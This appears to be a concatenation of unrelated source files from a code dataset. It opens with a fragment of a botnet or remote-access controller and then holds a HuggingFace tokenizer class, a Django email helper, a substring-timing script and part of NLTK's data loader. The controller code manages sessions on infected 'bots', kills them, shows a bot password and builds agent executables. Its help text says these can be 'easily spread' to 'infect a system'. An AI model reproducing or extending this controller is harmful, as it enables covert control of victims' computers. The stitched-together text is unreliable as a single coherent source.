print("CRITICAL : Blacklist file not found. Contact Developer.")
except IndexError:
print("USAGE : blacklist < ip > ")
elif(command == "settings"):
print(
"["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] TCP Server Host : " + server_settings['host'] +
"\n["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] TCP Server Port : " + server_settings['port'] +
"\n["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Print BOT INFO on connect : " + bot_settings['auto_print_bot_info'] +
"\n["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] BOT Password : " + bot_settings['password']
)
elif(command == "list" or command == "sessions"):
list_bots()
elif(command.startswith("session")):
s = command.split()
try:
sid = int(s[1])
prefix = BOTNAMEONLY(wan_ip_list[sid]).split("/")
prmpt = prefix[1].strip() + "("+Fore.RED+ Style.BRIGHT + wan_ip_list[sid] + Style.RESET_ALL +") > "
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Session opened for Client ID {id}.".format(id=str(sid)))
isSession = True
run_session(clients[sid],isSession, prmpt, sid, iplist[sid])
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Session closed for Client ID {id}.".format(id=str(sid)))
except IndexError:
try:
print("CID {s} not online.".format(s=s[1]))
except IndexError:
print("USAGE : session < session id> ")
except Exception as es:
print("Error! ("+str(es)+")")
elif(command == "bytecheck"):
message = input("Input : ")
msgsize = str(len(message)) + " Bytes."
if(len(message) > 100):
print("\nYour Input : " + message + "\nSize : " + msgsize + "\n(Not Eligible for Password)")
else:
print("\nYour Input : " + message + "\nSize : " + msgsize + "\n(Eligible for Password)")
elif(command.startswith("kill")):
try:
cid = int(args[1])
SendData(cid, "kill")
clients[cid].shutdown(socket.SHUT_RDWR)
clients[cid].close()
except IndexError:
print("USAGE : kill <session id>")
elif(command.startswith("build")):
try:
lh = args[1].split("=")
lp = args[2].split("=")
create_agent(lh[1], lp[1], args[3])
except IndexError:
print("""
[X] USAGE : build lhost=<lhost> lport=<lport> <static>/<normal>
LHOST - Ipv4 Address of Server to Connect to.
LPORT - Port of Server to Connect to.
static - Standalone Executable to run on almost any System.
normal - Executable that requires libraries to run.
EXAMPLES :
[+] build lhost=192.168.0.101 lport=443 static
|- Size : Around 2.1 MB.
                  |- This will generate an Executable that you can easily spread
                     without worrying about whether it will run.
               [+] build lhost=192.168.0.101 lport=443 normal
                  |- Size : Around 600 kb.
                  |- This will generate an Executable that you can use for tests
                     on your own PC, or to infect a system that has an environment
                     where it can run.
""")
elif(command.startswith("botinfo")):
try:
infoFor = iplist[int(args[1])]
ReadInformation(infoFor)
except IndexError:
print("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] USAGE : botinfo < cid > / botinfo -offline")
except ValueError:
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Loading offline bots..")
fl = os.listdir("bots")
fl.remove("readme.md")
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Offline Bots")
try:
for x in range(len(fl)):
print("""
[{index}] - [ {wanip} ] [ {os} ] [ {hname} ]
""".format(
index=str(x),
wanip=fl[x].replace(".ini", ""),
os=BOTOSONLY("bots/"+fl[x].replace(".ini", "")),
hname=BOTNAMEONLY("bots/"+fl[x].replace(".ini", ""))
))
ask = input("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] Enter Index : ")
if(len(ask) > 0):
fsp = fl[int(ask)]
ReadInformation("bots/"+fsp.replace(".ini", ""))
except Exception as UnknownException:
print("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] Error : " + str(UnknownException))
elif(command == "banner"):
print(pbanner())
elif(command.startswith("send")):
try:
cid = args[1]
SendData(cid, args[2])
except IndexError:
print("USAGE : send <id> <data>")
elif(command == "exit"):
if(len(clients) > 0):
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] You have online bots? Kill the connections?")
yn = input("Your Desicion (y/N) : ").lower()
if(yn == "y"):
broadcast("kill")
print("["+Style.BRIGHT + Fore.LIGHTGREEN_EX + "+" + Style.RESET_ALL + "] Disconnected everyone.")
exit(True)
else:
pass
else:
exit(True)
else:
if(len(command) > 0):
try:
print(Style.BRIGHT + Fore.LIGHTCYAN_EX )
subprocess.run(['bash', '-c', command])
print(Style.RESET_ALL)
except Exception as procError:
print("["+Style.BRIGHT + Fore.LIGHTBLUE_EX + "*" + Style.RESET_ALL + "] Error : " + str(procError))
except KeyboardInterrupt:
print(" = Interrupt. Type Exit to exit.")
|
the-stack_0_19844 | from tokenizers import Tokenizer, AddedToken, pre_tokenizers, decoders, trainers
from tokenizers.models import BPE
from tokenizers.normalizers import NFKC
from .base_tokenizer import BaseTokenizer
from typing import Optional, List, Union, Dict, Tuple, Iterator
class SentencePieceBPETokenizer(BaseTokenizer):
"""SentencePiece BPE Tokenizer
Represents the BPE algorithm, with the pretokenization used by SentencePiece
"""
def __init__(
self,
vocab: Optional[Union[str, Dict[str, int]]] = None,
merges: Optional[Union[str, Dict[Tuple[int, int], Tuple[int, int]]]] = None,
unk_token: Union[str, AddedToken] = "<unk>",
replacement: str = "▁",
add_prefix_space: bool = True,
dropout: Optional[float] = None,
fuse_unk: Optional[bool] = False,
):
if vocab is not None and merges is not None:
tokenizer = Tokenizer(
BPE(vocab, merges, dropout=dropout, unk_token=unk_token, fuse_unk=fuse_unk)
)
else:
tokenizer = Tokenizer(BPE())
if tokenizer.token_to_id(str(unk_token)) is not None:
tokenizer.add_special_tokens([str(unk_token)])
tokenizer.normalizer = NFKC()
tokenizer.pre_tokenizer = pre_tokenizers.Metaspace(
replacement=replacement, add_prefix_space=add_prefix_space
)
tokenizer.decoder = decoders.Metaspace(
replacement=replacement, add_prefix_space=add_prefix_space
)
parameters = {
"model": "SentencePieceBPE",
"unk_token": unk_token,
"replacement": replacement,
"add_prefix_space": add_prefix_space,
"dropout": dropout,
}
super().__init__(tokenizer, parameters)
@staticmethod
def from_file(vocab_filename: str, merges_filename: str, **kwargs):
vocab, merges = BPE.read_file(vocab_filename, merges_filename)
return SentencePieceBPETokenizer(vocab, merges, **kwargs)
def train(
self,
files: Union[str, List[str]],
vocab_size: int = 30000,
min_frequency: int = 2,
special_tokens: List[Union[str, AddedToken]] = ["<unk>"],
limit_alphabet: int = 1000,
initial_alphabet: List[str] = [],
show_progress: bool = True,
):
""" Train the model using the given files """
trainer = trainers.BpeTrainer(
vocab_size=vocab_size,
min_frequency=min_frequency,
special_tokens=special_tokens,
limit_alphabet=limit_alphabet,
initial_alphabet=initial_alphabet,
show_progress=show_progress,
)
if isinstance(files, str):
files = [files]
self._tokenizer.train(files, trainer=trainer)
def train_from_iterator(
self,
iterator: Union[Iterator[str], Iterator[Iterator[str]]],
vocab_size: int = 30000,
min_frequency: int = 2,
special_tokens: List[Union[str, AddedToken]] = ["<unk>"],
limit_alphabet: int = 1000,
initial_alphabet: List[str] = [],
show_progress: bool = True,
):
""" Train the model using the given iterator """
trainer = trainers.BpeTrainer(
vocab_size=vocab_size,
min_frequency=min_frequency,
special_tokens=special_tokens,
limit_alphabet=limit_alphabet,
initial_alphabet=initial_alphabet,
show_progress=show_progress,
)
self._tokenizer.train_from_iterator(iterator, trainer=trainer)
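# Minimal usage sketch (assuming the HuggingFace `tokenizers` package is
# installed; the corpus and vocab size are illustrative):
#
#   from tokenizers import SentencePieceBPETokenizer
#   tok = SentencePieceBPETokenizer()
#   tok.train_from_iterator(["hello world", "hello there"], vocab_size=100, min_frequency=1)
#   print(tok.encode("hello world").tokens)   # e.g. ['▁hello', '▁world']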
|
the-stack_0_19846 |
from django.template.loader import render_to_string
def send_order_email(user, order):
    subject = 'Your Order Details'
message = render_to_string('orders/order_email.html',
{
'user': user,
'order': order
})
    user.email_user(subject, message)
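# Usage sketch -- e.g. called from the checkout view or an Order post_save
# signal (the names below are illustrative):
#
#   send_order_email(request.user, order)
#
# email_user() sends to user.email and falls back to settings.DEFAULT_FROM_EMAIL
# for the sender when no from_email is given.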
|
the-stack_0_19849 | """
Assess the time complexity of searching for a substring.
"""
import functools
import random
import string
import timeit
import matplotlib.pyplot as plt
from tqdm import tqdm
def count(main_len=100, sub_len=10, num=10000):
"""Generate a larger string to search for a smaller string.
Both of varying length, default is a length difference of 10x.
Python doc description: Return the number of non-overlapping
occurrences of a substring
"""
def time_count():
letters = string.ascii_letters
main_string = "".join(random.choice(letters) for i in range(main_len))
sub_string = "".join(random.choice(letters) for i in range(sub_len))
timer = timeit.Timer(functools.partial(main_string.count, sub_string))
        # average seconds per str.count() call over this timing run
        sample_time = timer.timeit(num_time) / num_time
return sample_time
num_random = int(num / 100)
num_time = int(num / num_random)
time_samples = [time_count() for i in range(num_random)]
avg_time = sum(time_samples) / len(time_samples)
return avg_time
if __name__ == "__main__":
n = [10, 100, 500, 1000, 5000, 10000, 50000, 100000]
big_O = [count(main_len=x, sub_len=x // 10) for x in tqdm(n)]
plt.plot(n, big_O, marker="+")
plt.show()
|
the-stack_0_19851 | # Natural Language Toolkit: Utility functions
#
# Copyright (C) 2001-2014 NLTK Project
# Author: Edward Loper <[email protected]>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
Functions to find and load NLTK resource files, such as corpora,
grammars, and saved processing objects. Resource files are identified
using URLs, such as ``nltk:corpora/abc/rural.txt`` or
``http://nltk.org/sample/toy.cfg``. The following URL protocols are
supported:
- ``file:path``: Specifies the file whose path is *path*.
Both relative and absolute paths may be used.
- ``http://host/path``: Specifies the file stored on the web
server *host* at path *path*.
- ``nltk:path``: Specifies the file stored in the NLTK data
package at *path*. NLTK will search for these files in the
directories specified by ``nltk.data.path``.
If no protocol is specified, then the default protocol ``nltk:`` will
be used.
This module provides two functions that can be used to access a
resource file, given its URL: ``load()`` loads a given resource, and
adds it to a resource cache; and ``retrieve()`` copies a given resource
to a local file.
"""
from __future__ import print_function, unicode_literals
from __future__ import division
import sys
import io
import os
import textwrap
import re
import zipfile
import codecs
from gzip import GzipFile, READ as GZ_READ, WRITE as GZ_WRITE
try:
from zlib import Z_SYNC_FLUSH as FLUSH
except ImportError:
from zlib import Z_FINISH as FLUSH
try:
import cPickle as pickle
except ImportError:
import pickle
# this import should be more specific:
import nltk
from nltk.compat import py3_data, text_type, string_types, BytesIO, urlopen, url2pathname
######################################################################
# Search Path
######################################################################
path = []
"""A list of directories where the NLTK data package might reside.
These directories will be checked in order when looking for a
resource in the data package. Note that this allows users to
substitute in their own versions of resources, if they have them
(e.g., in their home directory under ~/nltk_data)."""
# User-specified locations:
path += [d for d in os.environ.get('NLTK_DATA', str('')).split(os.pathsep) if d]
if os.path.expanduser('~/') != '~/':
path.append(os.path.expanduser(str('~/nltk_data')))
if sys.platform.startswith('win'):
# Common locations on Windows:
path += [
str(r'C:\nltk_data'), str(r'D:\nltk_data'), str(r'E:\nltk_data'),
os.path.join(sys.prefix, str('nltk_data')),
os.path.join(sys.prefix, str('lib'), str('nltk_data')),
os.path.join(os.environ.get(str('APPDATA'), str('C:\\')), str('nltk_data'))
]
else:
# Common locations on UNIX & OS X:
path += [
str('/usr/share/nltk_data'),
str('/usr/local/share/nltk_data'),
str('/usr/lib/nltk_data'),
str('/usr/local/lib/nltk_data')
]
######################################################################
# Util Functions
######################################################################
def gzip_open_unicode(filename, mode="rb", compresslevel=9,
encoding='utf-8', fileobj=None, errors=None, newline=None):
if fileobj is None:
        fileobj = GzipFile(filename, mode, compresslevel, fileobj)
return io.TextIOWrapper(fileobj, encoding, errors, newline)
def split_resource_url(resource_url):
"""
Splits a resource url into "<protocol>:<path>".
>>> windows = sys.platform.startswith('win')
>>> split_resource_url('nltk:home/nltk')
('nltk', 'home/nltk')
>>> split_resource_url('nltk:/home/nltk')
('nltk', '/home/nltk')
>>> split_resource_url('file:/home/nltk')
('file', '/home/nltk')
>>> split_resource_url('file:///home/nltk')
('file', '/home/nltk')
>>> split_resource_url('file:///C:/home/nltk')
('file', '/C:/home/nltk')
"""
protocol, path_ = resource_url.split(':', 1)
if protocol == 'nltk':
pass
elif protocol == 'file':
if path_.startswith('/'):
path_ = '/' + path_.lstrip('/')
else:
path_ = re.sub(r'^/{0,2}', '', path_)
return protocol, path_
def normalize_resource_url(resource_url):
r"""
Normalizes a resource url
>>> windows = sys.platform.startswith('win')
>>> os.path.normpath(split_resource_url(normalize_resource_url('file:grammar.fcfg'))[1]) == \
... ('\\' if windows else '') + os.path.abspath(os.path.join(os.curdir, 'grammar.fcfg'))
True
>>> not windows or normalize_resource_url('file:C:/dir/file') == 'file:///C:/dir/file'
True
>>> not windows or normalize_resource_url('file:C:\\dir\\file') == 'file:///C:/dir/file'
True
>>> not windows or normalize_resource_url('file:C:\\dir/file') == 'file:///C:/dir/file'
True
>>> not windows or normalize_resource_url('file://C:/dir/file') == 'file:///C:/dir/file'
True
>>> not windows or normalize_resource_url('file:////C:/dir/file') == 'file:///C:/dir/file'
True
>>> not windows or normalize_resource_url('nltk:C:/dir/file') == 'file:///C:/dir/file'
True
>>> not windows or normalize_resource_url('nltk:C:\\dir\\file') == 'file:///C:/dir/file'
True
>>> windows or normalize_resource_url('file:/dir/file/toy.cfg') == 'file:///dir/file/toy.cfg'
True
>>> normalize_resource_url('nltk:home/nltk')
'nltk:home/nltk'
>>> windows or normalize_resource_url('nltk:/home/nltk') == 'file:///home/nltk'
True
>>> normalize_resource_url('http://example.com/dir/file')
'http://example.com/dir/file'
>>> normalize_resource_url('dir/file')
'nltk:dir/file'
"""
try:
protocol, name = split_resource_url(resource_url)
except ValueError:
# the resource url has no protocol, use the nltk protocol by default
protocol = 'nltk'
name = resource_url
# use file protocol if the path is an absolute path
if protocol == 'nltk' and os.path.isabs(name):
protocol = 'file://'
name = normalize_resource_name(name, False, None)
elif protocol == 'file':
protocol = 'file://'
# name is absolute
name = normalize_resource_name(name, False, None)
elif protocol == 'nltk':
protocol = 'nltk:'
name = normalize_resource_name(name, True)
else:
# handled by urllib
protocol += '://'
return ''.join([protocol, name])
def normalize_resource_name(resource_name, allow_relative=True, relative_path=None):
"""
:type resource_name: str or unicode
:param resource_name: The name of the resource to search for.
Resource names are posix-style relative path names, such as
``corpora/brown``. Directory names will automatically
be converted to a platform-appropriate path separator.
Directory trailing slashes are preserved
>>> windows = sys.platform.startswith('win')
>>> normalize_resource_name('.', True)
'./'
>>> normalize_resource_name('./', True)
'./'
>>> windows or normalize_resource_name('dir/file', False, '/') == '/dir/file'
True
>>> not windows or normalize_resource_name('C:/file', False, '/') == '/C:/file'
True
>>> windows or normalize_resource_name('/dir/file', False, '/') == '/dir/file'
True
>>> windows or normalize_resource_name('../dir/file', False, '/') == '/dir/file'
True
"""
is_dir = bool(re.search(r'[\\/.]$', resource_name)) or resource_name.endswith(os.path.sep)
if sys.platform.startswith('win'):
resource_name = resource_name.lstrip('/')
else:
resource_name = re.sub(r'^/+', '/', resource_name)
if allow_relative:
resource_name = os.path.normpath(resource_name)
else:
if relative_path is None:
relative_path = os.curdir
resource_name = os.path.abspath(os.path.join(relative_path, resource_name))
resource_name = resource_name.replace('\\', '/').replace(os.path.sep, '/')
if sys.platform.startswith('win') and os.path.isabs(resource_name):
resource_name = '/' + resource_name
if is_dir and not resource_name.endswith('/'):
resource_name += '/'
return resource_name
######################################################################
# Path Pointers
######################################################################
class PathPointer(object):
"""
An abstract base class for 'path pointers,' used by NLTK's data
package to identify specific paths. Two subclasses exist:
``FileSystemPathPointer`` identifies a file that can be accessed
directly via a given absolute path. ``ZipFilePathPointer``
identifies a file contained within a zipfile, that can be accessed
by reading that zipfile.
"""
def open(self, encoding=None):
"""
Return a seekable read-only stream that can be used to read
the contents of the file identified by this path pointer.
:raise IOError: If the path specified by this pointer does
not contain a readable file.
"""
raise NotImplementedError('abstract base class')
def file_size(self):
"""
Return the size of the file pointed to by this path pointer,
in bytes.
:raise IOError: If the path specified by this pointer does
not contain a readable file.
"""
raise NotImplementedError('abstract base class')
def join(self, fileid):
"""
Return a new path pointer formed by starting at the path
identified by this pointer, and then following the relative
path given by ``fileid``. The path components of ``fileid``
should be separated by forward slashes, regardless of
        the underlying file system's path separator character.
"""
raise NotImplementedError('abstract base class')
class FileSystemPathPointer(PathPointer, text_type):
"""
A path pointer that identifies a file which can be accessed
directly via a given absolute path.
"""
@py3_data
def __init__(self, _path):
"""
Create a new path pointer for the given absolute path.
:raise IOError: If the given path does not exist.
"""
_path = os.path.abspath(_path)
if not os.path.exists(_path):
raise IOError('No such file or directory: %r' % _path)
self._path = _path
# There's no need to call str.__init__(), since it's a no-op;
# str does all of its setup work in __new__.
@property
def path(self):
"""The absolute path identified by this path pointer."""
return self._path
def open(self, encoding=None):
stream = open(self._path, 'rb')
if encoding is not None:
stream = SeekableUnicodeStreamReader(stream, encoding)
return stream
def file_size(self):
return os.stat(self._path).st_size
def join(self, fileid):
_path = os.path.join(self._path, fileid)
return FileSystemPathPointer(_path)
def __repr__(self):
# This should be a byte string under Python 2.x;
# we don't want transliteration here so
# @python_2_unicode_compatible is not used.
return str('FileSystemPathPointer(%r)' % self._path)
def __str__(self):
return self._path
class BufferedGzipFile(GzipFile):
"""
A ``GzipFile`` subclass that buffers calls to ``read()`` and ``write()``.
This allows faster reads and writes of data to and from gzip-compressed
files at the cost of using more memory.
The default buffer size is 2MB.
``BufferedGzipFile`` is useful for loading large gzipped pickle objects
as well as writing large encoded feature files for classifier training.
"""
SIZE = 2 * 2**20
@py3_data
def __init__(self, filename=None, mode=None, compresslevel=9,
fileobj=None, **kwargs):
"""
Return a buffered gzip file object.
:param filename: a filesystem path
:type filename: str
:param mode: a file mode which can be any of 'r', 'rb', 'a', 'ab',
'w', or 'wb'
:type mode: str
:param compresslevel: The compresslevel argument is an integer from 1
to 9 controlling the level of compression; 1 is fastest and
produces the least compression, and 9 is slowest and produces the
most compression. The default is 9.
:type compresslevel: int
:param fileobj: a BytesIO stream to read from instead of a file.
:type fileobj: BytesIO
:param size: number of bytes to buffer during calls to read() and write()
:type size: int
:rtype: BufferedGzipFile
"""
GzipFile.__init__(self, filename, mode, compresslevel, fileobj)
self._size = kwargs.get('size', self.SIZE)
self._buffer = BytesIO()
# cStringIO does not support len.
self._len = 0
def _reset_buffer(self):
# For some reason calling BytesIO.truncate() here will lead to
# inconsistent writes so just set _buffer to a new BytesIO object.
self._buffer = BytesIO()
self._len = 0
def _write_buffer(self, data):
# Simply write to the buffer and increment the buffer size.
if data is not None:
self._buffer.write(data)
self._len += len(data)
def _write_gzip(self, data):
# Write the current buffer to the GzipFile.
GzipFile.write(self, self._buffer.getvalue())
# Then reset the buffer and write the new data to the buffer.
self._reset_buffer()
self._write_buffer(data)
def close(self):
        # GzipFile.close() doesn't actually close anything.
if self.mode == GZ_WRITE:
self._write_gzip(None)
self._reset_buffer()
return GzipFile.close(self)
def flush(self, lib_mode=FLUSH):
self._buffer.flush()
GzipFile.flush(self, lib_mode)
def read(self, size=None):
if not size:
size = self._size
contents = BytesIO()
while True:
blocks = GzipFile.read(self, size)
if not blocks:
contents.flush()
break
contents.write(blocks)
return contents.getvalue()
else:
return GzipFile.read(self, size)
def write(self, data, size=-1):
"""
:param data: bytes to write to file or buffer
:type data: bytes
:param size: buffer at least size bytes before writing to file
:type size: int
"""
if not size:
size = self._size
if self._len + len(data) <= size:
self._write_buffer(data)
else:
self._write_gzip(data)
class GzipFileSystemPathPointer(FileSystemPathPointer):
"""
A subclass of ``FileSystemPathPointer`` that identifies a gzip-compressed
file located at a given absolute path. ``GzipFileSystemPathPointer`` is
appropriate for loading large gzip-compressed pickle objects efficiently.
"""
def open(self, encoding=None):
stream = BufferedGzipFile(self._path, 'rb')
if encoding:
stream = SeekableUnicodeStreamReader(stream, encoding)
return stream
class ZipFilePathPointer(PathPointer):
"""
A path pointer that identifies a file contained within a zipfile,
which can be accessed by reading that zipfile.
"""
@py3_data
def __init__(self, zipfile, entry=''):
"""
Create a new path pointer pointing at the specified entry
in the given zipfile.
:raise IOError: If the given zipfile does not exist, or if it
does not contain the specified entry.
"""
if isinstance(zipfile, string_types):
zipfile = OpenOnDemandZipFile(os.path.abspath(zipfile))
# Normalize the entry string, it should be absolute:
entry = normalize_resource_name(entry, False, '/').lstrip('/')
# Check that the entry exists:
if entry:
try:
zipfile.getinfo(entry)
except Exception:
# Sometimes directories aren't explicitly listed in
# the zip file. So if `entry` is a directory name,
# then check if the zipfile contains any files that
# are under the given directory.
if (entry.endswith('/') and
[n for n in zipfile.namelist() if n.startswith(entry)]):
pass # zipfile contains a file in that directory.
else:
# Otherwise, complain.
raise IOError('Zipfile %r does not contain %r' %
(zipfile.filename, entry))
self._zipfile = zipfile
self._entry = entry
@property
def zipfile(self):
"""
The zipfile.ZipFile object used to access the zip file
containing the entry identified by this path pointer.
"""
return self._zipfile
@property
def entry(self):
"""
The name of the file within zipfile that this path
pointer points to.
"""
return self._entry
def open(self, encoding=None):
data = self._zipfile.read(self._entry)
stream = BytesIO(data)
if self._entry.endswith('.gz'):
stream = BufferedGzipFile(self._entry, fileobj=stream)
elif encoding is not None:
stream = SeekableUnicodeStreamReader(stream, encoding)
return stream
def file_size(self):
return self._zipfile.getinfo(self._entry).file_size
def join(self, fileid):
entry = '%s/%s' % (self._entry, fileid)
return ZipFilePathPointer(self._zipfile, entry)
def __repr__(self):
return str('ZipFilePathPointer(%r, %r)') % (
self._zipfile.filename, self._entry)
def __str__(self):
return os.path.normpath(os.path.join(self._zipfile.filename, self._entry))
######################################################################
# Access Functions
######################################################################
# Don't use a weak dictionary, because in the common case this
# causes a lot more reloading than necessary.
_resource_cache = {}
"""A dictionary used to cache resources so that they won't
need to be loaded more than once."""
def find(resource_name, paths=None):
"""
Find the given resource by searching through the directories and
zip files in paths, where a None or empty string specifies an absolute path.
Returns a corresponding path name. If the given resource is not
found, raise a ``LookupError``, whose message gives a pointer to
the installation instructions for the NLTK downloader.
Zip File Handling:
- If ``resource_name`` contains a component with a ``.zip``
extension, then it is assumed to be a zipfile; and the
remaining path components are used to look inside the zipfile.
- If any element of ``nltk.data.path`` has a ``.zip`` extension,
then it is assumed to be a zipfile.
- If a given resource name that does not contain any zipfile
component is not found initially, then ``find()`` will make a
second attempt to find that resource, by replacing each
component *p* in the path with *p.zip/p*. For example, this
allows ``find()`` to map the resource name
``corpora/chat80/cities.pl`` to a zip file path pointer to
``corpora/chat80.zip/chat80/cities.pl``.
- When using ``find()`` to locate a directory contained in a
zipfile, the resource name must end with the forward slash
character. Otherwise, ``find()`` will not locate the
directory.
:type resource_name: str or unicode
:param resource_name: The name of the resource to search for.
Resource names are posix-style relative path names, such as
``corpora/brown``. Directory names will be
automatically converted to a platform-appropriate path separator.
:rtype: str
"""
resource_name = normalize_resource_name(resource_name, True)
# Resolve default paths at runtime in-case the user overrides nltk.data.path
if paths is None:
paths=path
# Check if the resource name includes a zipfile name
m = re.match(r'(.*\.zip)/?(.*)$|', resource_name)
zipfile, zipentry = m.groups()
# Check each item in our path
for path_ in paths:
# Is the path item a zipfile?
if path_ and (os.path.isfile(path_) and path_.endswith('.zip')):
try:
return ZipFilePathPointer(path_, resource_name)
except IOError:
# resource not in zipfile
continue
# Is the path item a directory or is resource_name an absolute path?
elif not path_ or os.path.isdir(path_):
if zipfile is None:
p = os.path.join(path_, url2pathname(resource_name))
if os.path.exists(p):
if p.endswith('.gz'):
return GzipFileSystemPathPointer(p)
else:
return FileSystemPathPointer(p)
else:
p = os.path.join(path_, url2pathname(zipfile))
if os.path.exists(p):
try:
return ZipFilePathPointer(p, zipentry)
except IOError:
# resource not in zipfile
continue
# Fallback: if the path doesn't include a zip file, then try
# again, assuming that one of the path components is inside a
# zipfile of the same name.
if zipfile is None:
pieces = resource_name.split('/')
for i in range(len(pieces)):
modified_name = '/'.join(pieces[:i]+[pieces[i]+'.zip']+pieces[i:])
try:
return find(modified_name, paths)
except LookupError:
pass
# Display a friendly error message if the resource wasn't found:
msg = textwrap.fill(
'Resource %r not found. Please use the NLTK Downloader to '
'obtain the resource: >>> nltk.download()' %
(resource_name,), initial_indent=' ', subsequent_indent=' ',
width=66)
msg += '\n Searched in:' + ''.join('\n - %r' % d for d in paths)
sep = '*'*70
resource_not_found = '\n%s\n%s\n%s' % (sep, msg, sep)
raise LookupError(resource_not_found)
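# Usage sketch (resource names are illustrative):
#
#   find('corpora/abc/rural.txt')     # -> FileSystemPathPointer or ZipFilePathPointer
#   find('corpora/chat80/cities.pl')  # resolved inside corpora/chat80.zip if needed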
def retrieve(resource_url, filename=None, verbose=True):
"""
Copy the given resource to a local file. If no filename is
specified, then use the URL's filename. If there is already a
file named ``filename``, then raise a ``ValueError``.
:type resource_url: str
:param resource_url: A URL specifying where the resource should be
loaded from. The default protocol is "nltk:", which searches
        for the file in the NLTK data package.
"""
resource_url = normalize_resource_url(resource_url)
if filename is None:
if resource_url.startswith('file:'):
filename = os.path.split(resource_url)[-1]
else:
filename = re.sub(r'(^\w+:)?.*/', '', resource_url)
if os.path.exists(filename):
filename = os.path.abspath(filename)
raise ValueError("File %r already exists!" % filename)
if verbose:
print('Retrieving %r, saving to %r' % (resource_url, filename))
# Open the input & output streams.
infile = _open(resource_url)
# Copy infile -> outfile, using 64k blocks.
with open(filename, "wb") as outfile:
while True:
s = infile.read(1024*64) # 64k blocks.
outfile.write(s)
if not s: break
infile.close()
#: A dictionary describing the formats that are supported by NLTK's
#: load() method. Keys are format names, and values are format
#: descriptions.
FORMATS = {
'pickle': "A serialized python object, stored using the pickle module.",
'json': "A serialized python object, stored using the json module.",
'yaml': "A serialized python object, stored using the yaml module.",
'cfg': "A context free grammar.",
'pcfg': "A probabilistic CFG.",
'fcfg': "A feature CFG.",
'fol': "A list of first order logic expressions, parsed with "
"nltk.sem.logic.Expression.fromstring.",
'logic': "A list of first order logic expressions, parsed with "
"nltk.sem.logic.LogicParser. Requires an additional logic_parser "
"parameter",
'val': "A semantic valuation, parsed by nltk.sem.Valuation.fromstring.",
'raw': "The raw (byte string) contents of a file.",
'text': "The raw (unicode string) contents of a file. "
}
#: A dictionary mapping from file extensions to format names, used
#: by load() when format="auto" to decide the format for a
#: given resource url.
AUTO_FORMATS = {
'pickle': 'pickle',
'json': 'json',
'yaml': 'yaml',
'cfg': 'cfg',
'pcfg': 'pcfg',
'fcfg': 'fcfg',
'fol': 'fol',
'logic': 'logic',
'val': 'val',
'txt': 'text',
'text': 'text',
}
def load(resource_url, format='auto', cache=True, verbose=False,
logic_parser=None, fstruct_reader=None, encoding=None):
"""
Load a given resource from the NLTK data package. The following
resource formats are currently supported:
- ``pickle``
- ``json``
- ``yaml``
- ``cfg`` (context free grammars)
- ``pcfg`` (probabilistic CFGs)
- ``fcfg`` (feature-based CFGs)
- ``fol`` (formulas of First Order Logic)
- ``logic`` (Logical formulas to be parsed by the given logic_parser)
- ``val`` (valuation of First Order Logic model)
- ``text`` (the file contents as a unicode string)
- ``raw`` (the raw file contents as a byte string)
If no format is specified, ``load()`` will attempt to determine a
format based on the resource name's file extension. If that
fails, ``load()`` will raise a ``ValueError`` exception.
For all text formats (everything except ``pickle``, ``json``, ``yaml`` and ``raw``),
it tries to decode the raw contents using UTF-8, and if that doesn't
work, it tries with ISO-8859-1 (Latin-1), unless the ``encoding``
is specified.
:type resource_url: str
:param resource_url: A URL specifying where the resource should be
loaded from. The default protocol is "nltk:", which searches
        for the file in the NLTK data package.
:type cache: bool
:param cache: If true, add this resource to a cache. If load()
finds a resource in its cache, then it will return it from the
cache rather than loading it. The cache uses weak references,
        so a resource will automatically be expunged from the cache
when no more objects are using it.
:type verbose: bool
:param verbose: If true, print a message when loading a resource.
Messages are not displayed when a resource is retrieved from
the cache.
:type logic_parser: LogicParser
:param logic_parser: The parser that will be used to parse logical
expressions.
:type fstruct_reader: FeatStructReader
:param fstruct_reader: The parser that will be used to parse the
feature structure of an fcfg.
:type encoding: str
:param encoding: the encoding of the input; only used for text formats.
"""
resource_url=normalize_resource_url(resource_url)
# Determine the format of the resource.
if format == 'auto':
resource_url_parts = resource_url.split('.')
ext = resource_url_parts[-1]
if ext == 'gz':
ext = resource_url_parts[-2]
format = AUTO_FORMATS.get(ext)
if format is None:
raise ValueError('Could not determine format for %s based '
'on its file\nextension; use the "format" '
'argument to specify the format explicitly.'
% resource_url)
if format not in FORMATS:
raise ValueError('Unknown format type: %s!' % (format,))
# If we've cached the resource, then just return it.
if cache:
resource_val = _resource_cache.get((resource_url, format))
if resource_val is not None:
if verbose:
print('<<Using cached copy of %s>>' % (resource_url,))
return resource_val
# Let the user know what's going on.
if verbose:
print('<<Loading %s>>' % (resource_url,))
# Load the resource.
opened_resource = _open(resource_url)
if format == 'raw':
resource_val = opened_resource.read()
elif format == 'pickle':
resource_val = pickle.load(opened_resource)
elif format == 'json':
import json
from nltk.jsontags import json_tags
resource_val = json.load(opened_resource)
tag = None
if len(resource_val) != 1:
            tag = next(iter(resource_val.keys()))
if tag not in json_tags:
raise ValueError('Unknown json tag.')
elif format == 'yaml':
import yaml
resource_val = yaml.load(opened_resource)
else:
# The resource is a text format.
binary_data = opened_resource.read()
if encoding is not None:
string_data = binary_data.decode(encoding)
else:
try:
string_data = binary_data.decode('utf-8')
except UnicodeDecodeError:
string_data = binary_data.decode('latin-1')
if format == 'text':
resource_val = string_data
elif format == 'cfg':
resource_val = nltk.grammar.CFG.fromstring(
string_data, encoding=encoding)
elif format == 'pcfg':
resource_val = nltk.grammar.PCFG.fromstring(
string_data, encoding=encoding)
